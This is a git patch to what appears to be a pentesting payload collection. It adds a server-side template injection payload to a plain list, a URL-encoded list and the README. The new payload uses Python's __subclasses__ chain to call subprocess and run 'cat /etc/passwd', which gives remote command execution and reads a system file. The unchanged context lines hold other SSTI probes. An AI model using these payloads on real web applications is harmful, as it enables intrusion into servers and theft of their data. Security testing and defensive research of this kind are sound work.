From 9c6f8dec44acdeae33d74e392dbae6cf49f7fa8c Mon Sep 17 00:00:00 2001
From: Ayham Al-Ali <alali_ayham@yahoo.com>
Date: Fri, 6 Jan 2023 22:00:54 +0300
Subject: [PATCH] =?UTF-8?q?=F0=9F=9A=80=20Add=20new=20payload?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Intruder/ssti-payloads.txt            | 1 +
 Intruder/ssti-urlencoded-payloads.txt | 1 +
 README.md                             | 1 +
 3 files changed, 3 insertions(+)

diff --git a/Intruder/ssti-payloads.txt b/Intruder/ssti-payloads.txt
index 5b93508..9bfea84 100644
--- a/Intruder/ssti-payloads.txt
+++ b/Intruder/ssti-payloads.txt
@@ -14,6 +14,7 @@ ${{3*3}}
 {{ [].class.base.subclasses() }}
 {{''.class.mro()[1].subclasses()}}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
+{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
 {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
 {{'a'.toUpperCase()}} 
 {{ request }}
diff --git a/Intruder/ssti-urlencoded-payloads.txt b/Intruder/ssti-urlencoded-payloads.txt
index d91759d..cc59c8e 100644
--- a/Intruder/ssti-urlencoded-payloads.txt
+++ b/Intruder/ssti-urlencoded-payloads.txt
@@ -13,6 +13,7 @@
 %7B%7B%20%5B%5D.class.base.subclasses%28%29%20%7D%7D%0A
 %7B%7B%27%27.class.mro%28%29%5B1%5D.subclasses%28%29%7D%7D%0A
 %7B%7B%20%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%20%7D%7D%0A
+%7B%7B%27%27%2E%5F%5Fclass%5F%5F%2E%5F%5Fbase%5F%5F%2E%5F%5Fsubclasses%5F%5F%28%29%5B227%5D%28%27cat%20%2Fetc%2Fpasswd%27%2C%20shell%3DTrue%2C%20stdout%3D%2D1%29%2Ecommunicate%28%29%7D%7D
 %7B%25%20for%20key%2C%20value%20in%20config.iteritems%28%29%20%25%7D%3Cdt%3E%7B%7B%20key%7Ce%20%7D%7D%3C/dt%3E%3Cdd%3E%7B%7B%20value%7Ce%20%7D%7D%3C/dd%3E%7B%25%20endfor%20%25%7D%0A
 %7B%7B%27a%27.toUpperCase%28%29%7D%7D%20%0A
 %7B%7B%20request%20%7D%7D%0A
diff --git a/README.md b/README.md
index f8ddf12..e90bcec 100644
--- a/README.md
+++ b/README.md
@@ -33,6 +33,7 @@ ${{3*3}}
 {{ [].class.base.subclasses() }}
 {{''.class.mro()[1].subclasses()}}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
+{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
 {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
 {{'a'.toUpperCase()}} 
 {{ request }}